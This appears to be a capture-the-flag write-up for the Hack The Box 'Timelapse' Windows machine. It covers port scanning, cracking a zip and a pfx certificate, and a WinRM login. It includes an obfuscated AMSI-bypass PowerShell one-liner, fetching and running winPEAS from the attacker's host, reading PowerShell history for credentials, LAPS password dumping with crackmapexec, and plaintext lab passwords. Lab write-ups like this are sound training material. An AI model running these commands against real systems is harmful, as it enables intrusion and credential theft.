TIMELAPSE
RPC LDAP SMB
Windows
10.10.11.152
Easy
Release: 03-25-2022
First of all, we need to enumerate and scan the opened ports. Follow the steps bellow:
- Make new dirs for a full and detailed port scan output files. It's a good pratice organize the files the most as possible.
- Now, we run a non deep nmap scan command (first 1000 ports), just to list the opened ports.
- Move the output files to "nmap_full" dir.
- With the last nmap output results, we need rescans the specifics ports with a deep scan, to enumerate services.
- Move the output files to "nmap_ports" dir.
TIP: If the listed open ports wasn't returned any information about exploit/vulnerability/payload, try to run a deep scan with nmap using de -p- option, maybe there are high ports opened that wasn't listed before:
#nmap -sV -p- -v 10.10.11.152 -oA nmap
Check the commands used for the initial enumeration:
(root💀kali): ~/htb/timelapse/
# mkdir nmap_full ; mkdir nmap_ports/
(root💀kali): ~/htb/timelapse/
# nmap -Pn -n -v 10.10.11.152 -oA nmap/
(root💀kali): ~/htb/timelapse/
# mv nmap.* ./nmap_full/
(root💀kali): ~/htb/timelapse/
# nmap -sV -p53,88,135,139,389,445,464,593,636,3268,3269 -v 10.10.11.152 -oA nmap
(root💀kali): ~/htb/timelapse/
# mv nmap.* ./nmap_ports/
(root💀kali): ~/htb/timelapse/
# cat ./nmap_ports/nmap.nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
As we have a open port 445, let's check if there is some networks mapped:
Screen captures:
Command list:
- The "winrm_backup.zip" file is password protected. Searchig in the web, we can find that john the ripper can crack zip files hashes with a wordlist using
zip2johntool. - Now we got "winrm_backup.zip" file extracted, we need to figure out how to open the extracted file called "legacyy_dev_auth.pfx". Searchig in the web, we can find that .pfx files are a type of certificate used by Windows. It has password protection, so we need crack it to generate a .key and a .crt file.
- Luckly john the ripper (again) can crack pfx file hashes with a wordlist using
pfx2johntool. - With the cracked password, we can generate a .key and a .crt file to bypass a user session by winrm.
- get the User flag inside the "user.txt" file.
Screen captures:
Commands list:
For windows enummeration, we'll use "winPEAS" script tool.
- First attempt, AMSI blocked the WinPEAS.bat and WinPEAS.exe
- knowing that, we need to find a way to bypass this security protection from PowerShell.
- Check the output for possible ways to privesc or get private data.
- Find some credentials in PowerShell history file.
Screen captures:
Command list:
- (root💀kali): ~/htb/timelapse/ # wget https://github.com/carlospolop/PEASS-ng/releases/download/20220410/winPEASx64.exe
- (root💀kali): ~/htb/timelapse/ # python -m SimpleHTTPServer
- *Evil-WinRM* PS Invoke-WebRequest -Uri "http://10.10.XX.XX:8000/winPEASx64.exe" -OutFile "test.exe"
- *Evil-WinRM* PS cp text.exe 1.exe
- *Evil-WinRM* PS [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
- *Evil-WinRM* PS .\1.exe > out.txt
- *Evil-WinRM* PS download out.txt
- *Evil-WinRM* PS rm 1.exe
- *Evil-WinRM* PS rm test.exe
- *Evil-WinRM* PS rm out.txt
- (root💀kali): ~/htb/timelapse/ # cat out.txt
- *Evil-WinRM* PS type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Now with some credentials, we need explore how to use them, and escalate to a admin account
- In the enumeration phase we check some files in SMB Network maps. In HelpDesk folder we found some LAPS documentation files. This can be usefull.
- The second point, we can find in te WinPEAS output file, a list of the system users. Usefull to make a wordlist for brute force attacks.
- With those informations, searching on the web, we can find some LAPS/LDAP attacks.
- We'll use
crackmapexectool to dump target host credentials, using the valid credential we found in the powershell command history.
Screen captures:
Command list:
- (root💀kali): ~/htb/timelapse/ # crackmapexec ldap 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' –kdcHost 10.10.11.152 -M laps
- (root💀kali): ~/htb/timelapse/ # evil-winrm -i 10.10.11.152 -S -u 'Administrator' -p 'n+8+y]V#qcqIUpMxOpFU2#ms'
- *Evil-WinRM* PS dir ../../
- *Evil-WinRM* PS dir ../../TRX/Desktop
- *Evil-WinRM* PS type ../../TRX/Desktop/root.txt
- https://www.hackingarticles.in/active-directory-enumeration-rpcclient/
- https://dfir.science/2014/07/how-to-cracking-zip-and-rar-protected.html
- https://stackoverflow.com/questions/53547386/how-to-run-john-ripper-attack-to-p12-password-educative-pruposes
- https://miloserdov.org/?p=5008
- https://countuponsecurity.files.wordpress.com/2016/09/jtr-cheat-sheet.pdf
- https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file
- https://support.cpanel.net/hc/en-us/articles/360053003553-How-to-extract-Encrypted-Private-key-from-a-PFX-file
- https://book.hacktricks.xyz/cryptography/certificates
- https://www.hackingarticles.in/window-privilege-escalation-automated-script/
- https://www.hackingarticles.in/window-privilege-escalation-automated-script/
- https://github.com/carlospolop/PEASS-ng/releases
- https://www.hackingarticles.in/credential-dumpinglaps/